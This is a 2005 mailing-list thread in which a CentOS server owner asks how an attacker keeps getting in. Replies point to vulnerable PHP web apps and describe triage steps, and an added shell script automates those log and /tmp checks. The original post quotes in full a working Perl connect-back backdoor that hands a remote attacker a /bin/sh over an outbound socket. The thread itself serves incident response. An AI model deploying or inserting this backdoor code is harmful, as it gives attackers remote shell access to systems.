I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in because I had an outdated version of 'gallery' installed. I rebuilt the server and updated gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
---------------------------
#!/usr/bin/perl
# Connect-back shell: the script dials OUT to the host/port given on the
# command line (so inbound firewalling alone does not stop it) and hands
# the attacker a /bin/sh whose stdin/stdout/stderr are the socket.
use Socket;

print "Data Cha0s Connect Back Backdoor\n\n";

if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    exit(1);
}

print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;            # defaults to 80 so the outbound connection looks like web traffic
if ($ARGV[1]) {
    $port = $ARGV[1];
}

print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die("Socket Error\n");
my $target = inet_aton($host);
# hand-packed sockaddr_in (AF_INET = 2, port, address, 8 bytes padding)
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
}

print "[*] Spawning Shell\n";
if (!fork()) {
    open(STDIN,  ">&SERVER");
    open(STDOUT, ">&SERVER");
    open(STDERR, ">&SERVER");
    # argv[0] is set to '-bash' so the shell shows up as a login shell in ps
    exec {'/bin/sh'} '-bash' . "\0" x 4;
    exit(0);
}
print "[*] Datached\n\n";
--------------------------------
A bit of simple Googling should point you in the right direction...
http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&...
Are you running Twiki open to the internet?
http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html
Will.
On 30/11/05, Ajay Sharma ssharma@revsharecorp.com wrote:
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit. I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited...
-Greg
Same deal here. It had to do with having globals on in php. Also, the script lived in /tmp but was in a hidden directory, so be sure to run ls -al. I've forgotten the directory name... .something. I found in there the script, a zip file, tons of email addresses and so on. I removed it but it came back pretty quickly. If I recall, it first happened with a photo upload script and then they moved to a blog or forum script the user was running. Lots of Brazilian email addresses were involved and the mqueue was so full that rm * would not work. I had to dump thousands at a time instead of the whole queue at once.
It is a good idea to go ahead and shut down sendmail or whichever you use as your loads will get out of hand.
Best, John Hinton
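As an added example (not from the thread or from any of its posters), here is a small shell script that automates the checks Greg and John describe: list dot-named entries in a temp directory that plain ls hides, take the dropped file's mtime, and tally which script was requested in that same minute of the Apache access_log. It assumes GNU coreutils/find (stat -c, date -d, touch -d) as on CentOS; the paths and log lines are constructed sample data.

```shell
#!/bin/sh
# Added triage helpers (not from the thread). Assumes GNU coreutils/find
# (stat -c, date -d, touch -d) as on CentOS; the paths and log lines
# below are constructed sample data.
set -e

# Every entry in DIR whose name starts with a dot, one per line. Plain 'ls'
# hides names like '...' used to park a dropped script in /tmp.
list_hidden_entries() {
    find "$1" -mindepth 1 -maxdepth 1 -name '.*' -exec basename {} \;
}

# Minute in which FILE was last modified, in access_log timestamp form
# (dd/Mon/yyyy:HH:MM, local time, the zone Apache logs in).
file_minute() {
    LC_ALL=C date -d "@$(stat -c %Y "$1")" '+%d/%b/%Y:%H:%M'
}

# access_log lines stamped within MINUTE (e.g. 30/Nov/2005:13:45).
requests_in_minute() {
    grep -F "[$2:" "$1"
}

# Count requested paths (query string stripped), most requested first.
top_scripts() {
    awk '{p=$7; sub(/\?.*/, "", p); n[p]++} END {for (p in n) print n[p], p}' | sort -rn
}

# Non-httpd processes running as the web server user, with start time.
apache_nonhttpd_procs() {
    ps -u "${1:-apache}" -o pid=,lstart=,comm= | grep -v httpd || true
}

# --- constructed fixtures: a /tmp with a '...' directory and a small log ---
WORK=$(mktemp -d); trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/tmp/..."
touch -d '2005-11-30 13:45:10' "$WORK/tmp/.../dc.txt"
LOG="$WORK/access_log"
cat > "$LOG" <<'EOF'
10.0.0.5 - - [30/Nov/2005:13:44:58 -0800] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [30/Nov/2005:13:45:09 -0800] "GET /cal/page.php?x=1 HTTP/1.1" 200 77
10.0.0.9 - - [30/Nov/2005:13:45:11 -0800] "GET /cal/page.php?x=2 HTTP/1.1" 200 77
10.0.0.5 - - [30/Nov/2005:13:47:01 -0800] "GET /gallery/ HTTP/1.1" 200 4096
EOF
echo "hidden entries:"; list_hidden_entries "$WORK/tmp"
MIN=$(file_minute "$WORK/tmp/.../dc.txt")
echo "dropped file written in minute $MIN; requests in that minute, by script:"
requests_in_minute "$LOG" "$MIN" | top_scripts
```

On a real box, point list_hidden_entries at /tmp and /var/tmp, file_minute at the dropped script, and requests_in_minute at the live access_log; the script that tops the count is the one to audit first.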
Thanks for the tip. I checked the /tmp folder closely and found a '...' directory. Why I didn't notice that first is beyond me. Anyway, I saw the date and found the bunk script. Apparently it was a busted copy of WebCalendar: http://www.k5n.us/webcalendar.php
--Ajay